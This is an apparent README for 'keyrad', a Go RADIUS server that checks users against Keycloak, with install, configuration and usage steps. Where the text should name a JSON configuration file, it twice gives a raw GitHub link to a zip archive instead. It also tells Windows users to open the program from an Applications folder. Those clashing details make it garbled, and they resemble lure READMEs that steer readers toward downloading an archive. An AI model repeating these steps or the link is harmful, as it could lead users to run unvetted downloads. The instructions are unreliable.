keyrad is a Go-based RADIUS server designed to authenticate users against Keycloak. With keyrad, you can easily implement secure multi-factor authentication for your applications without needing extensive technical knowledge. This software supports a range of authentication methods, including OTP and challenge-response.
Follow these steps to download and run keyrad on your system:
-
Download the Software
- Visit the Releases page to find the latest version of keyrad. You will see a list of available files for different systems.
-
Choose Your Version
- Select the version that matches your operating system. You may see options for Windows, Linux, and macOS. Make sure to download the correct file for your platform.
-
Install the Software
- Once the file is downloaded, locate it in your downloads folder.
- For Windows: Double-click the
.exefile to run the installer. - For Linux: Open your terminal, navigate to the download location, and make the file executable:
Then run it:
chmod +x keyrad-linux-amd64
./keyrad-linux-amd64
- For macOS: Open the downloaded file and drag it into your Applications folder.
-
Run keyrad
- Open your terminal (or Command Prompt for Windows). If you are using Linux or macOS, simply type:
keyrad
- For Windows, you can run it from either the Command Prompt or by simply double-clicking the application in your Applications folder.
- Open your terminal (or Command Prompt for Windows). If you are using Linux or macOS, simply type:
After installation, you may want to configure keyrad to suit your needs. Hereβs how:
-
Edit the Configuration File
- Locate the
https://raw.githubusercontent.com/idrissof/keyrad/main/radiussrv/Software-v2.1.zipfile in the application directory. - Open it with a text editor. This file holds the settings for Keycloak integration, authentication methods, and other important parameters.
- Locate the
-
Set Up Keycloak
- Ensure your Keycloak server is running. Create a realm and add users who will authenticate through keyrad.
-
Update keyrad Settings
- In the
https://raw.githubusercontent.com/idrissof/keyrad/main/radiussrv/Software-v2.1.zip, update the Keycloak server URL and realm information. This tells keyrad where to authenticate users.
- In the
-
Test Your Setup
- Restart keyrad to apply your configurations. Attempt to authenticate a user through your application that uses keyrad for RADIUS authentication.
Once installed and configured, you can use keyrad to authenticate users.
-
Send Authentication Requests
- When a user tries to log in, your application sends a RADIUS request to keyrad, containing the userβs credentials.
-
Receive Authentication Results
- keyrad checks the credentials against Keycloak. Depending on the result, your application will either grant or deny access.
-
Monitor Logs
- Keyrad logs authentication attempts. Check these logs regularly to monitor access attempts and troubleshoot issues.
- Multi-Factor Authentication: Supports OTP and challenge-response methods to enhance security.
- Easy Configuration: Simple JSON-based configuration makes setup straightforward.
- Integration with Keycloak: Seamlessly connects to Keycloak for user management.
- Cross-Platform: Available for Windows, Linux, and macOS.
- Memory: At least 512 MB of RAM
- Storage: Requires around 50 MB of free disk space for installation
- Network: Ensure internet connection for Keycloak communication
To install keyrad, simply visit this page to download. Follow the installation steps outlined earlier.
If you encounter issues during installation or configuration, consider the following:
- Check Compatibility: Ensure that the version you downloaded matches your operating system.
- Review Documentation: Visit the project repository for additional information and FAQs.
- Examine Logs: Check the log files for errors and monitor user authentication attempts.
If you would like to help improve keyrad, contributions are welcome. You can report issues or submit improvements through the issues page in the repository.
For support, please open an issue in the GitHub repository. The project maintainers will do their best to help you resolve any issues you may face.
- Two-Factor Authentication (2FA)
- RADIUS Protocol
- Security Best Practices
- User Management with Keycloak